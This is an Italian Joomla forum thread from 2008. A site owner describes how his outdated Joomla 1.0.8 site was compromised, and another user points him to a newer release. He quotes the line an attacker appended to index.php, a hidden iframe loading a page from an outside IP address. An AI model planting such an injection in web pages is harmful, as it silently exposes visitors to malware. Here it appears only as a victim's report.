Joomla.it Forum

Joomla! 1.0.x (versione con supporto terminato) => Le voci di Joomla.it (solo per versione Joomla 1.0.x) => : tavolez 05 Sep 2008, 00:30:15

: Mi hanno hackerato il sito, ma ho risolto..Richiedo assistenza agli esperti...
: tavolez 05 Sep 2008, 00:30:15

Salve ragazzi,

E' da qualche tempo che accedendo al mio sito Joomla con alcuni browser (Firefox e Chorme), mi viene data la segnalazione di SITO PERICOLOSO per il mio pc (MALWARE), a causa di un link presente alla mia pagina contente l'IP: 81.2.197.14

Ho cercato su google ma non ho trovato nulla.

Poi oggi mi rendo conto che nel file index.php qualche male intenzionato deve avere aggiunto una stringa finale che vi riporto qui:

doGzip();
?><!-- ~ --><div style="visibility:hidden"><iframe src="http://81.2.197.14/pls/pls2/count.php?o=2" width=100 height=80></iframe></div><!-- ~ -->

Ora la ho cancellata, e sembra essere tornato tutto a posto (nessun browser mi dice che il mio sito contiene MALWARE).

Come diavolo è possibile che qualcuno sia riuscito a fare questo?
Premetto che per pigrizia e COLPA mia, ho una versione di Joomla vecchia di almeno 2 anni (1.0.8 stable ita) quindi sicuramente so che è meglio avere versioni aggiornate...

Però mi sembra assurdo che qualcuno possa entrare e modificare la mia index.php....

Qualcuno potrebbe per piacere illuminarmi sulla questione e su come funzionano queste cose?

Grazie :)

: Re: Mi hanno hackerato il sito, ma ho risolto..Richiedo assistenza agli esperti.
: tavolez 06 Sep 2008, 13:55:30

up

: Re: Mi hanno hackerato il sito, ma ho risolto..Richiedo assistenza agli esperti...
: = odino = 06 Sep 2008, 15:01:24

Leggiti del rilascio della 1.5.6...

: Re: Mi hanno hackerato il sito, ma ho risolto..Richiedo assistenza agli esperti.
: tavolez 08 Sep 2008, 00:42:47

cioè era un bug?

: Re: Mi hanno hackerato il sito, ma ho risolto..Richiedo assistenza agli esperti...
: = odino = 08 Sep 2008, 09:04:19

così capisci la dinamica ( non il problema nel tuo caso specifico ) di come ti han bucato